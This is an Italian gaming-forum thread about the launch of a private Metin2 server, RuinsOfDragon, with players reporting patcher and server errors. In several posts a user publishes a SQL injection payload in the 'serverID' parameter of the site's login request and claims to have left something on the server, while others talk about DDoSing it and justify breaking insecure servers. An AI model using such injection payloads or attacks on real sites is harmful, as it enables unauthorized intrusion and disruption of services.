®®®RuinsOfDragon - ® - New-Style- Livello Massimo 150 - [Official Start 6/11/12] Novità Mai Viste -

Stato
Discussione chiusa ad ulteriori risposte.
Re: ®®®RuinsOfDragon - ® - New-Style- Livello Massimo 150 - [Official Start 4/11/12] Novità Mai Viste - Cosa Aspettate? Entrate! ®®®

Umh carino,quasi quasi provo !

Re: ®®®RuinsOfDragon - ® - New-Style- Livello Massimo 150 - [Official Start 4/11/12] Novità Mai Viste - Cosa Aspettate? Entrate! ®®®

mmm dunque anche a me stesso problema dopo 3 ore di download una volta estratto il client e avvianto il RuinsPatcher.exe non carica gli aggiornamenti....ora va beh poco importa se siete abili fate una patch e via..

mentre spero che non ve ne uscite col dire " scaricate il nuovo client bla bla bal" altre 3 ore non me le faccio xD

Ti sbagli di grosso ^^
Tra poco sarà tutto risolto.

guarda sono felice di sbagliare infatti xD per tra poco quindi intendete in serata? o domani mattina?

Al 99% questa sera, non per qualcosa ma solo per dimostrarvi la serietà nostra (e c'è gente che deve andare al lavoro domani ). :)

Benone dai ...sisi capisco tutto e tutti Ryuk tranquillo.

[h=1]Internal Server Error[/h]The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.

speriamo in bene mi fido :O

Sembra veramente bello;)
Provo,spero non deluda;)

ah a che stasera mettete on come si deve ricordatevi delle registrazioni altrimenti lavorare per stasera non ha senso xD

Manca poco e torna tutto normale.
Alla faccia di qualche soggetto che parla e parla ma con i fatti vale meno di 0 direi.. ^^
Loro tra poco inizieranno a piangere, mentre voi a giocare tranquilli... ;)

Forza Ryuk

ottimo! mi fa piacere che almeno siete costanti sugli aggiornamenti ! detto questo Ryuk ricordati delle registrazioni per giocare cosa che al momento non è possibile fare visto il sito OFF

è da 1 anno che non gioco a metin e vorrei rincominciare su questo server, sapete il perchè mi da 500 internal server error ????

Giusto perchè ho letto "ricky92" e quell'altro coso di bacca001 mi metto in mezzo..
quali falle?quali xss? naturalmente è robba da newbie e ingrandita come sta facendo un cretino nel post..che sa trovare le xss da programmini per window e poi se le sbatte tutti sui denti...oppure quell'altro (o addirittura sempre lo stess "sapientone") che continua a ddossare il server....un semplice grab alle porte e si potrebbe reversare l'attacco :)

ma passiamo ai "fatti"..ovvero che il sito e il freebsd fanno schifo.
POST http://www.ruinsofdragon.it/home/index.php?pagina=add_session HTTP/1.1
Accept-Encoding: gzip
/index.php?pagina=rank&sv=1

"action=&serverID=52%22%20OR%20%2252%22%3D%2252&serverID=1&passID=FrAmE30.&loginID=3419"
Come vedete la vulnerabilità è nel "ServerID" .
Io personalmente ci ho gia lasciato un ricordino per fare i miei migliori auguri a ricky92 the best genio of ?

?? di cosa non lo so.....

Mettete reg momentanea?

voi siete indescrivibili secondo me....perchè non lasciate soltanto scegliere le persone dove giocare? ma cristo santo Metin2 è un GIOCO ? come tanti miliardi di giochi esistenti è giusto giocarli se poi fanno pietà o meno la gente lo capisce ...

Gioco= divertimento .

Lasciateci divertire e basta stop -.-

Ci si diverte a rompere certi server.
Visto che le protezioni sono assolutamenente inesistenti.
Per poi dare la colpa a quello o quell'altro.
Prima di aprire sempre proteggere. :\

Giusto perchè ho letto "ricky92" e quell'altro coso di bacca001 mi metto in mezzo..
quali falle?quali xss? naturalmente è robba da newbie e ingrandita come sta facendo un cretino nel post..che sa trovare le xss da programmini per window e poi se le sbatte tutti sui denti...oppure quell'altro (o addirittura sempre lo stess "sapientone") che continua a ddossare il server....un semplice grab alle porte e si potrebbe reversare l'attacco :)

ma passiamo ai "fatti"..ovvero che il sito e il freebsd fanno schifo.
POST http://www.ruinsofdragon.it/home/index.php?pagina=add_session HTTP/1.1
Accept-Encoding: gzip
/index.php?pagina=rank&sv=1

"action=&serverID=52%22%20OR%20%2252%22%3D%2252&serverID=1&passID=FrAmE30.&loginID=3419"
Come vedete la vulnerabilità è nel "ServerID" .
Io personalmente ci ho gia lasciato un ricordino per fare i miei migliori auguri a ricky92 the best genio of ?

?? di cosa non lo so.....

ogni minaccia che scrivono certi incapaci lamer mi fa ridere sempre di più..cioè sul serio?? volete mettere paura sul serio ai gf? Quanto potete dossare, mezz'ora??
Poi?? wow che paura..se riusciste a usare almeno una di quelle falle che "trovate" con il vostro intelletto superiore allora parlereste di meno e agireste di piu.
Per fortuna non avete un minimo di consocienza e neanche un minimo di cervello altrimenti andreste in giro a ownare e distruggere server (dato che l'unico bug è nel bsd e NESSUNO si è letto nemmeno un tutorial su come fixarlo)

2 anni che manco ma gli stessi idioti di una volta ora invece che vantarsi fanno i fatti (e a quanto pare fanno schifo :DD) e i newbie di allora ora fanno gli squali

PARLO AL PLURALE O AL GENERALE PER NON DARE IMPORTANZA A DEFICENTI COME "PROMISE" O COME SI CHIAMA...NON VORREI MAI INTRALCIARMI SULLA SUA STRADA! PERCHE DEFICENTI COSI PORTANO SOLO GUAI!! :) IDIOTA VAI A STUDIARE ACCANNA METIN E IMPARATI QUALCOSA. BUON SCANNER NERD CON OBIETTIVI MEDIOCRI.

in ogni caso sfidatevi altrove a me interessa giocare quì e vorrei sapere come vanno le cose.

voi siete indescrivibili secondo me....perchè non lasciate soltanto scegliere le persone dove giocare? ma cristo santo Metin2 è un GIOCO ? come tanti miliardi di giochi esistenti è giusto giocarli se poi fanno pietà o meno la gente lo capisce ...

Gioco= divertimento .

Lasciateci divertire e basta stop -.-

No, qui su Inforge, Metin2 è diventato una guerra / competizione (anzi direi in Italia).

ogni minaccia che scrivono certi incapaci lamer mi fa ridere sempre di più..cioè sul serio?? volete mettere paura sul serio ai gf? Quanto potete dossare, mezz'ora??
Poi?? wow che paura..se riusciste a usare almeno una di quelle falle che "trovate" con il vostro intelletto superiore allora parlereste di meno e agireste di piu.
Per fortuna non avete un minimo di consocienza e neanche un minimo di cervello altrimenti andreste in giro a ownare e distruggere server (dato che l'unico bug è nel bsd e NESSUNO si è letto nemmeno un tutorial su come fixarlo)

2 anni che manco ma gli stessi idioti di una volta ora invece che vantarsi fanno i fatti (e a quanto pare fanno schifo :DD) e i newbie di allora ora fanno gli squali

PARLO AL PLURALE O AL GENERALE PER NON DARE IMPORTANZA A DEFICENTI COME "PROMISE" O COME SI CHIAMA...NON VORREI MAI INTRALCIARMI SULLA SUA STRADA! PERCHE DEFICENTI COSI PORTANO SOLO GUAI!! :) IDIOTA VAI A STUDIARE ACCANNA METIN E IMPARATI QUALCOSA. BUON SCANNER NERD CON OBIETTIVI MEDIOCRI.

:itagliano:

Ryuk novità?

Purtroppo hai ragione :patt:
Hai sottolineato tu stesso che nessuno si legge come FIX il BSD.
Quindi non capisco cosa ci sia di male nel farlo capire in metodi non molto " normali " ma drastici.
Almeno così i player di un Server sono PROTETTI.
Invece di dire protezioni ecc ecc al massimo le solite ca**te.

Hai ragione dovrei fare qualcos'altro, ma fino a quando vedo questi certi server che aprono, TANTI player si fidano delle loro protezioni, ma sono ASSENTI, questo non mi piace e non mi è mai piaciuto.
In passato MOLTE se non troppe volte mi è capitato di dedicarmi in un server dove veniva sempre scritto : " Protezioni, ecc ecc tutto inpenetrabile, untouched. "

Per questo.
Sbaglio lo so.

Purtroppo hai ragione :patt:
Hai sottolineato tu stesso che nessuno si legge come FIX il BSD.
Quindi non capisco cosa ci sia di male nel farlo capire in metodi non molto " normali " ma drastici.
Almeno così i player di un Server sono PROTETTI.
Invece di dire protezioni ecc ecc al massimo le solite ca**te.

Hai ragione dovrei fare qualcos'altro, ma fino a quando vedo questi certi server che aprono, TANTI player si fidano delle loro protezioni, ma sono ASSENTI, questo non mi piace e non mi è mai piaciuto.
In passato MOLTE se non troppe volte mi è capitato di dedicarmi in un server dove veniva sempre scritto : " Protezioni, ecc ecc tutto inpenetrabile, untouched. "

Per questo.
Sbaglio lo so.

:oddio: è come dire: non mangio perchè dimagrisco.

Quello che hai detto è un "rivoluzionario" ... ma non hai ne conoscenze ne intenzioni di farlo.
Scrivi ti vanti poca protezione risalti le tue abilità..in realtà esegui un programma e ci metti un indirizzo ip..magari lo fai anche da window.
E' vero che i founder sono dei poveri idioti che si sono sempre vantati e hanno sempre fallito.
Bacca001 lo sa bene la storia di me e il suo server..
non parliamo di ricky...
se vuoi infastidire i veri incapaci che si vantano (proprio come fai tu) mettili off e falli chiudere.
Personalmente preferisco creare fix per questi problemi, lo trovo piu utile e meno dannoso.

Stato
Discussione chiusa ad ulteriori risposte.
Indietro
Top Bottom